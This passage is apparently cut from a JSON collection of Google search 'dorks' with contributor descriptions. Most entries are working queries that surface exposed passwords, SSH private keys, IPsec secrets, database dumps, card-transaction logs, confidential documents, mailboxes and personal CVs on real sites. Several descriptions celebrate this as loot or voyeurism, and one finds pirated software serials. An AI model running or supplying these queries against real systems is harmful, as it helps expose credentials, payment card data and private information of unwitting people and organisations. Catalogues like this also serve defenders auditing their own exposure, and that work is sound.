"Mails leak by Rootkit."}, {"dork": "ext:log telnet intext:password", "description": "Telnet logs.\nBy Rootkit."}, {"dork": "filetype:mobileconfig intext:password OR intext:pass", "description": "filetype:mobileconfig intext:password OR intext:pass"}, {"dork": "ext:pem intext:BEGIN CERTIFICATE", "description": "Vulnerables CA files.\nBy Rootkit."}, {"dork": "intitle:index of /weekly cpbackup", "description": "useful for finding cpanel backups\n-- \nRegards,\nH.R."}, {"dork": "\"Futon on Apache\" inurl:_utils", "description": "Exposed CouchDB admin panels\nBy Gabor Szathmari"}, {"dork": "inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "description": "List of Directories of Unix and Linux webs.\nEnjoy!.\nBy Rootkit."}, {"dork": "intext:bbdd index.of \"/\" \"Parent Directory\"", "description": "Databases directory info. Have Fun!\nRootkit."}, {"dork": "inurl:src/viewcvs.cgi/log/.c?=", "description": "Vulnerable CVS logs"}, {"dork": "intitle:Tomcat Status | inurl:/status?full=true", "description": "JBOSS / Tomcat Status IP info\n-Xploit"}, {"dork": "-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "description": "Lots of interesting stuff!\nDecoy"}, {"dork": "inurl:http | -inurl:https inurl:ftp ext:pdf taxreturn", "description": "Amazing what you find with this..\n-Chopin"}, {"dork": "inurl:haproxy-status site:example.com", "description": "Dork to find system info leaks using haproxy stats.\n- ivxenog"}, {"dork": "inurl:configfile.cgi", "description": "Google dork:\ninurl:configfile.cgi\nD0bby"}, {"dork": "filetype:txt \"gmail\" | \"hotmail\" | \"yahoo\" -robots site:gov | site:us", "description": "filetype:txt \"gmail\" | \"hotmail\" | \"yahoo\" -robots site:gov | site:us\nEmails"}, {"dork": "\"Index of /wp-content/uploads/backupbuddy_backups\" zip", "description": "Search for iThemes BackupBuddy backup zips\n\u2013 balcsida"}, {"dork": "inurl:\"/irclogs/\" ext:log", "description": "Finds people's IRC logs\nDxtroyer"}, {"dork": "\"Fatal NI connect error\" \", connecting to:\" ext:log", "description": "Finds a whole load of different application logs (with errors!)\nDxtroyer"}, {"dork": "\"Greenstone receptionist\" inurl:\"/etc/main.cfg\"", "description": "Finds web app configs\nDxtroyer"}, {"dork": "\"# This file was generated by libcurl! Edit at your own risk.\" ext:txt", "description": "Finds leftover cookie data, sometimes containing vulnerable information\n(often encrypted)\nDxtroyer"}, {"dork": "inurl:\"/fb_ca_chain_bundle.crt\" ext:crt", "description": "Finds security certificates left behind by Facebook, potentially having\nsome useful info.\nDxtroyer"}, {"dork": "inurl:\"/sitemap.xsd\" ext:xsd", "description": "Finds files leading to sitemaps... Useful for finding login portals and\nstuff.\nDxtroyer"}, {"dork": "\"SERVER_ADDR\" \"SERVER_PORT\" \"SERVER_NAME\" ext:log", "description": "Finds logs with server information!\nDxtroyer"}, {"dork": "\"%@\" ext:ascx", "description": "Finds ASP configs and settings\nDxtroyer"}, {"dork": "\"Logfile of Trend Micro HijackThis\" ext:log", "description": "Finds AV logs from Trend Micro\nDxtroyer"}, {"dork": "\"# AdwCleaner\" ext:txt", "description": "Finds AdwCleaner logfiles\nDxtroyer"}, {"dork": "\"InnoDB:\" ext:log", "description": "Finds MySQL error logs and the such\nDxtroyer"}, {"dork": "\"[dirs]\" inurl:\"mirc.ini\" -git", "description": "Finds mIRC configuration files\nDxtroyer"}, {"dork": "\"HTTP\" inurl:\"access.log\" ext:log", "description": "Finds logs which contain info about website activity\nDxtroyer"}, {"dork": "\"Section\" inurl:\"xorg.conf\" ext:conf -wiki", "description": "Config files for Xorg X, containing victim's computer information\nDxtroyer"}, {"dork": "\"PHP Fatal error: require()\" ext:log", "description": "Finds PHP error logs\nDxtroyer"}, {"dork": "\"SECRET//NOFORN\" ext:pdf", "description": "Finds secret government documents\nDxtroyer"}, {"dork": "\"KVP_ENCDATA:Version=1.0\" ext:log", "description": "Finds transaction logs with bank account info and (drumroll please) credit\ncard numbers!\nDxtroyer"}, {"dork": "inurl:\"idx_config\"", "description": "Finds grabbed config by shell (database,cpanel,smtp....)\nDork: inurl:\"idx_config\"\nShad Karim\nThanks to :Anon Defacer"}, {"dork": "\"START securepay\" ext:log", "description": "Finds transaction logs (sometimes containing credit card numbers and other\njuicy info!)\nDxtroyer"}, {"dork": "\"-----BEGIN X509 CERTIFICATE-----\" ext:pem -git", "description": "Finds X.509 server certificates\nDxtroyer"}, {"dork": "\"-- MySQL Administrator dump\" ext:sql", "description": "Finds some nice database dumps, potentially containing usernames,\npasswords, and other cool stuff!\nDxtroyer"}, {"dork": "\"Consola de Joomla! Debug\" inurl:index.php", "description": "Dork to find the Joomla Debug console that gives us the following\ninformation\n> Session\n> Profile Information\n> Memory usage\n> Database Registration\n\"Consola de Joomla! Debug\" inurl:index.php\nDrok3r"}, {"dork": "inurl:\"dcwp_twitter.php?1=\"", "description": "Finds Twitter API logs with private messages, encrypted credentials, and\nmore!\nDxtroyer"}, {"dork": "inurl:app/config/ intext:parameters.yml intitle:index.of", "description": "Category: Files Containing Passwords\nQuery: inurl:app/config/ intext:parameters.yml intitle:index.of\nTarget: Symfony (PHP Framework)\nContains:\n - database & e-mail credentials\n - secret"}, {"dork": "\"random's system information tool\" ext:txt", "description": "Finds logs from system info stealers\nDxtroyer"}, {"dork": "\"[FFFTP]\" ext:ini", "description": "Finds files with FTP logins, server info, and more!\nDxtroyer"}, {"dork": "inurl:\"/Windows/Cookies/\" ext:txt -telecom -forbidden -git", "description": "Finds cookies stored by Windows, potentially containing encrypted usernames\n& passwords\nDxtroyer"}, {"dork": "\"Protocol=unreal\" ext:ini -git", "description": "People are going to hate me for this :P\nFinds Unreal game files, potentially containing admin passwords\nDxtroyer"}, {"dork": "intext:uploadOverwrite || intext:OPEN || intext:cwd", "description": "-------------------------------------------------------------\nGoogle Dork: intext:uploadOverwrite || intext:OPEN || intext:cwd\nAuthor: Tarkan Catal X\nThis dork allows you to search for elFinder (https://studio-42.github.io/elFinder) log file.\nThis file contains ( hidden ) paths, directories, files and other juicy information.\n--------------------------------------------------------------"}, {"dork": "inurl:\"/logs/www\" ext:log", "description": "Finds connection logs, with user agents, errors, and more\nDxtroyer"}, {"dork": "\"Blocking Reason:\" ext:log -git", "description": "Finds security breach logs\nDxtroyer"}, {"dork": "\"You're successfully running JSON Server\"", "description": "*Google Dork :- \"You're successfully running JSON Server\"*\n*You can browse through files (username+password)*\n-- \nNEAM :- Helmi"}, {"dork": "\"TX_start\" \"card_name\" ext:log", "description": "Finds transaction logs from stores, containing juicy credit/debit card info.\nDxtroyer"}, {"dork": "inurl:\"wp-content/uploads/file-manager/log.txt\"", "description": "WordPress Plugin File Manager log file with interesting information.\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar"}, {"dork": "\"-- Account dump\" ext:sql -git", "description": "Desc of Dork: Find juicy information on MySQL Dumps with the tag \n\"Account\".\n- SeekedNow"}, {"dork": "ext:log inurl:\"/pgadmin\"", "description": "pgAdmin client log files.\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar/"}, {"dork": "inurl:/secure/attachment/ filetype:log OR filetype:txt", "description": "Files containing logs and bug reports of JIRA software development tool\nDheeraj\nhttps://github.com/dheeraj-rn/"}, {"dork": "inurl:/maint/repair.php?repair=1", "description": "Wordpress database repair displaying active tables\n- ThePentester"}, {"dork": "inurl:scan_result_file", "description": "Will produce a list of sites that have clamAV results, which could list\npotential backdoors installed that an attacker can use to gain access to a\nsite.\n-- \nColette Chamberland\nCISSP, C|EH, C|HFI"}, {"dork": "ext:csproj", "description": "*Summary:*\nA Google dork that gives the information about the IIS configurations,\nreferenced libraries and all included file paths in server (.cs files etc)\nfrom the target .NET web application.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "ext:vbproj", "description": "*Category: *\nfiles containing juicy info\nweb server detection\nsensitive directories\n*Summary:*\nA Google dork that gives the information about the IIS configurations,\nreferenced libraries and all included file paths in server (.vb files etc)\nfrom the target Visual Basic .NET web application.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "inurl:\".hg/store/fncache\"", "description": "hg repository dork\n@tahaSuleyman"}, {"dork": "filetype:tpl intext:mysql_connect", "description": "mysql_connect in php template files (db username and db password):\r\n\r\n\r\n\r\nfiletype:tpl intext:mysql_connect\r\n\r\n\r\n\r\n-al4r0"}, {"dork": "ext:asax", "description": "*Summary:*\nA Google dork that gives the information about target .NET web application\nand source code.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "inurl:FileListAbsolute ext:txt", "description": "*Category:*\nweb server detection\nfiles containing juicy info\n*Summary:*\nA Google dork that gives the information about target web server's physical\npath\nand loaded DLLs.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "\"OTL logfile\" \"by OldTimer\" ext:txt", "description": "Finds logs of OldTimer ListIt (main log): \"OTL logfile\" \"by OldTimer\" ext:txt\nFinds logs of OldTimer ListIt (extra log): \"OTL Extras logfile\" \"by OldTimer\" ext:txt\n-- \nDan Peretz"}, {"dork": "\"QuickDiag\" \"by g3n-h@ckm@n\" ext:txt", "description": "Finds logs of QuickDiag\n-- \nDan Peretz"}, {"dork": "ext:txt | ext:conf | ext:inc | ext:doc intext:php class JConfig", "description": "Joomla configuration files!\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:/Divi/Changelog.txt /Divi/Changelog.txt", "description": "*Category:*\nfiles containing juicy info\n*Summary:*\nA Google dork that gives the information about wordpress Divi plugin\nchangelog\n*Dork discovered by:*\nm0be1"}, {"dork": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", "description": "AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages."}, {"dork": "intitle:index.of finances.xls", "description": "Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"}, {"dork": "intitle:\"Index of\" finance.xls", "description": "Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"}, {"dork": "intitle:index.of intext:.ssh", "description": "Find peoples ssh public and private keys\n- tmc / #havok"}, {"dork": "site:bitbucket.org inurl:.bash_history", "description": "Finding Sensitive data\nsite:bitbucket.org inurl:.bash_history\nBy Pharos"}, {"dork": "\"google confidential\" filetype:pdf", "description": "\"google confidential\" filetype:pdf\nGoogle leaking their own files"}, {"dork": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "description": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"\nDork to find gov't emails.\n~ Carl"}, {"dork": "filetype:pub inurl:ssh", "description": "This dork finds various SSH pub files.\nAuthor:NickiK."}, {"dork": "inurl:vidyo -site:vidyo.com inurl:portal", "description": "Vidyo Portals. File Disclosure\ninurl:vidyo -site:vidyo.com inurl:portal"}, {"dork": "buddylist.blt", "description": "These searches bring up common names for AOL Instant Messenger \"buddylists\". These lists contain screen names of your \"online buddies\" in Instant Messenger. Not that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The thing that's interesting are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. This is really for the peepers out there, and it' possible to spend countless hours rifling through people's personal crap. Also try buddylist.blt, buddy.blt, buddies.blt."}, {"dork": "intitle:phpinfo \"PHP Version\"", "description": "this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks \"joe!\" =)"}, {"dork": "intitle:index.of robots.txt", "description": "The robots.txt file contains \"rules\" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff.However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!"}, {"dork": "\"This report was generated by WebLog\"", "description": "These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a schmorgasbord! =P"}, {"dork": "\"These statistics were produced by getstats\"", "description": "Another web statistics package. This one originated from a google scan of an ivy league college. *sigh*There's sooo much stuff in here!"}, {"dork": "\"This summary was generated by wwwstat\"", "description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots os good stuff.You know, these are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...thanks, sac =)"}, {"dork": "intitle:index.of haccess.ctl", "description": "this is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. nice find."}, {"dork": "filetype:ctl Basic", "description": "haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file decribes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =PThis method is very reliable due to the use of this google query:filetype:ctl BasicThis pulls out the file by name then searches for a string inside of it (Basic) which appears in the standard template for this file."}, {"dork": "site:edu admin grades", "description": "I never really thought about this until I started coming up with juicy examples for DEFCON 11.. A few GLARINGLY bad examples contain not only student grades and names, but also social security numbers, securing the highest of all googledork ratings!"}, {"dork": "intitle:index.of mystuff.xml", "description": "This particular file contains web links that trillian users have entered into the tool. Trillian combines many different messaging programs into one tool. AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here!"}, {"dork": "\"# phpMyAdmin MySQL-Dump\" filetype:txt", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..."}, {"dork": "\"# phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..."}, {"dork": "intitle:index.of cgiirc.config", "description": "CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!"}, {"dork": "inurl:cgiirc.config", "description": "This is another less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!"}, {"dork": "inurl:ipsec.secrets -history -bugs", "description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!"}, {"dork": "inurl:ipsec.secrets \"holds shared secrets\"", "description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!"}, {"dork": "inurl:ipsec.conf -intitle:manpage", "description": "The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting...."}, {"dork": "intitle:\"statistics of\" \"advanced web statistics\"", "description": "the awstats program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more which can provide very interesting recon information for an attacker."}, {"dork": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", "description": "The webalizer program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker."}, {"dork": "\"robots.txt\" \"Disallow:\" filetype:txt", "description": "The robots.txt file serves as a set of instructions for web crawlers. The \"disallow\" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!"}, {"dork": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"}, {"dork": "inurl:main.php phpMyAdmin", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"}, {"dork": "inurl:main.php Welcome to phpMyAdmin", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"}, {"dork": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", "description": "These devices are running HP Insight Management Agents for Servers which \"provide device information for all managed subsystems. Alerts are generated by SNMP traps.\" The information on these pages include server addresses and other assorted SNMP information."}, {"dork": "intitle:index.of \"Apache\" \"server at\"", "description": "This is a very basic string found on directory listing pages which show the version of the Apache web server. Hackers can use this information to find vulnerable targets without querying the servers."}, {"dork": "intitle:index.of dead.letter", "description": "dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information."}, {"dork": "intitle:index.of ws_ftp.ini", "description": "ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!"}, {"dork": "inurl:admin intitle:login", "description": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information."}, {"dork": "intitle:admin intitle:login", "description": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information."}, {"dork": "inurl:admin filetype:xls", "description": "This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information."}, {"dork": "\"Most Submitted Forms and Scripts\" \"this section\"", "description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots of good stuff.These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly..."}, {"dork": "inurl:changepassword.asp", "description": "This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. These links can be used to troll around a website."}, {"dork": "\"not for distribution\" confidential", "description": "The terms \"not for distribution\" and confidential indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should neither be considered confidential or private."}, {"dork": "\"Thank you for your order\" +receipt", "description": "After placing an order via the web, many sites provide a page containing the phrase \"Thank you for your order\" and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop."}, {"dork": "\"Network Vulnerability Assessment Report\"", "description": "This search yeids vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "\"Host Vulnerability Summary Report\"", "description": "This search yeids host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "intitle:index.of inbox", "description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."}, {"dork": "intitle:index.of inbox dbx", "description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."}, {"dork": "intitle:index.of inbox dbx", "description": "This search reveals potential location for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."}, {"dork": "\"#mysql dump\" filetype:sql", "description": "This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information."}, {"dork": "inurl:vbstats.php \"page generated\"", "description": "This is your typical stats page listing referrers and top ips and such. This information can certainly be used to gather information about a site and its visitors."}, {"dork": "\"Index of\" / \"chat/logs\"", "description": "This search reveals chat logs. Depending on the contents of the logs, these files could contain just about anything!"}, {"dork": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", "description": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list."}, {"dork": "inurl:\"newsletter/admin/\"", "description": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. This is a less acurate search than the similar intitle:\"newsletter admin\" search."}, {"dork": "allinurl:servlet/SnoopServlet", "description": "These pages reveal server information such as port, server software version, server name, full paths, etc."}, {"dork": "\"Running in Child mode\"", "description": "This is a gnutella client that was picked up by google. There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, ip addresses, and gnutella client versions."}, {"dork": "\"This is a Shareaza Node\"", "description": "These pages are from Shareaza client programs. Various data is displayed including client version, ip address, listening ports and uptime."}, {"dork": "inurl:server-status \"apache\"", "description": "This page shows all sort of information about the Apache web server. It can be used to track process information, directory maps, connection data, etc."}, {"dork": "inurl:fcgi-bin/echo", "description": "This is the fastcgi echo script, which provides a great deal of information including port numbers, server software versions, port numbers, ip addresses, path names, file names, time zone, process id's, admin email, fqdns, etc!"}, {"dork": "inurl:cgi-bin/printenv", "description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more."}, {"dork": "inurl:perl/printenv", "description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more."}, {"dork": "inurl:server-info \"Apache Server Information\"", "description": "This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some informatino listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more...."}, {"dork": "intext:\"Tobias Oetiker\" \"traffic analysis\"", "description": "This is the MRTG traffic analysis pages. This page lists information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network."}, {"dork": "inurl:tdbin", "description": "This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publically accessible."}, {"dork": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf", "description": "These are samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network."}, {"dork": "filetype:conf inurl:firewall -intitle:cvs", "description": "These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes."}, {"dork": "\"HTTP_FROM=googlebot\" googlebot.com \"Server_Software=\"", "description": "These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. Attackers can use information like this to formulate an attack against a site."}, {"dork": "\"Request Details\" \"Control Tree\" \"Server Variables\"", "description": "These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. Attackers can use this information to formulate a very advanced attack against these targets."}, {"dork": "filetype:wab wab", "description": "These are Microsoft Outlook Mail address books. The information contained will vary, but at the least an attacker can glean email addresses and contact information."}, {"dork": "filetype:mbx mbx intext:Subject", "description": "These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. Either way, addresses and email text can be pulled from these files."}, {"dork": "filetype:eml eml +intext:\"Subject\" +intext:\"From\"", "description": "These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target."}, {"dork": "filetype:lic lic intext:key", "description": "License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file."}, {"dork": "filetype:log cron.log", "description": "Displays logs from cron, the *nix automation daemon. Can be used to determine backups, full and realtive paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate. An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to backup their logfiles, this cron log will give that away too."}, {"dork": "filetype:log access.log -CVS", "description": "These are http server access logs which contain all sorts of information ranging from usernames and passwords to trusted machines on the network to full paths on the server. Could be VERY useful in scoping out a potential target."}, {"dork": "filetype:blt blt +intext:screenname", "description": "Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list."}, {"dork": "intitle:intranet inurl:intranet +intext:\"phone\"", "description": "These pages are often private intranet pages which contain phone listings and email addresses. These pages can be used as a sort of online \"dumpster dive\"."}, {"dork": "inurl:php.ini filetype:ini", "description": "The php.ini file contains all the configuration for how PHP is parsed on a server. It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information. Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory."}, {"dork": "\"Mecury Version\" \"Infastructure Group\"", "description": "Mecury is a centralized ground control program for research satellites. This query simply locates servers running this software. As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it."}, {"dork": "inurl:forward filetype:forward -cvs", "description": "Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses."}, {"dork": "94FBR \"ADOBE PHOTOSHOP\"", "description": "94FBR is part of many serials. An malicious user would only have to change the programm name (photoshop in this example) in this search to find a perfectly valid serial.Other values to look for are: GC6J3. GTQ62. FP876. D3DX8."}, {"dork": "filetype:ctt ctt messenger", "description": "MSN Messenger uses the file extension *.ctt when you export the contact list. An attacker could use this for social enginering tricks."}, {"dork": "filetype:conf inurl:unrealircd.conf -cvs -gentoo", "description": "Development of UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).This search finds configuration files to Unreal IRCd. An attacker can use these to possibly determine the oper passwd. Be warned that there are samples in the results."}, {"dork": "inurl:/public/?Cmd=contents", "description": "This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different, it just depends which link Google has crawled.An attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social enginering tricks."}, {"dork": "filetype:mny mny", "description": "Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny.A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called \"Passware\"."}, {"dork": "\"# Dumping data for table (username|user|users|password)\"", "description": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper..... Note: this is a cleanup version of an older googledork entry."}, {"dork": "intitle:\"Welcome to ntop!\"", "description": "Ntop shows the current network usage. It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host. An attacker may use this to gather information about hosts and services behind the firewall."}, {"dork": "e-mail address filetype:csv csv", "description": "Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation."}, {"dork": "inurl:ssl.conf filetype:conf", "description": "The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways."}, {"dork": "\"sets mode: +p\"", "description": "This search reveals private channels on IRC as revealed by IRC chat logs."}, {"dork": "intitle:\"index of\" +myd size", "description": "The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm. An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database."}, {"dork": "intitle:\"Index Of\" -inurl:maillog maillog size", "description": "This google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to-date, all of which contain various chunks of information (ie. Usernames, email adresses, Login/Logout times of users, IPAdresses, directories on the server ect. ect.)Someone, with this information could dig up info on the server before trying to penetrate it by finding usernames, and email adresses of accounts on the server."}, {"dork": "filetype:ora ora", "description": "Greetings, The *.ora files are configuration files for oracle clients. An attacker can identify a oracle database this way and get more juicy information by searching for ora config files.This search can be modified to be more specific:- filetype:ora sqlnet - filetype:ora names"}, {"dork": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", "description": "Returns publically visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called \"phpinfo.php\". Some result files that include phpinfo are:"}, {"dork": "inurl:*db filetype:mdb", "description": "More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search."}, {"dork": "filetype:cfg auto_inst.cfg", "description": "Mandrake auto-install configuration files. These contain information about the installed packages, networking setttings and even user accounts."}, {"dork": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", "description": "Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the \"disallow\" keyword."}, {"dork": "intext:\"Session Start * * * *:*:* *\" filetype:log", "description": "These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun."}, {"dork": "ext:asp inurl:pathto.asp", "description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This searches pathto.asp files and allows an attacker to know the exact installed path of the software.Examples:The path to your Site is -- g:\\0E5\\goldenstateeng.xxx\\webThe path to your Site is -- D:\\inetpub\\wwwroot\\01xx738\\mc10s9izz"}, {"dork": "\"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", "description": "This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is 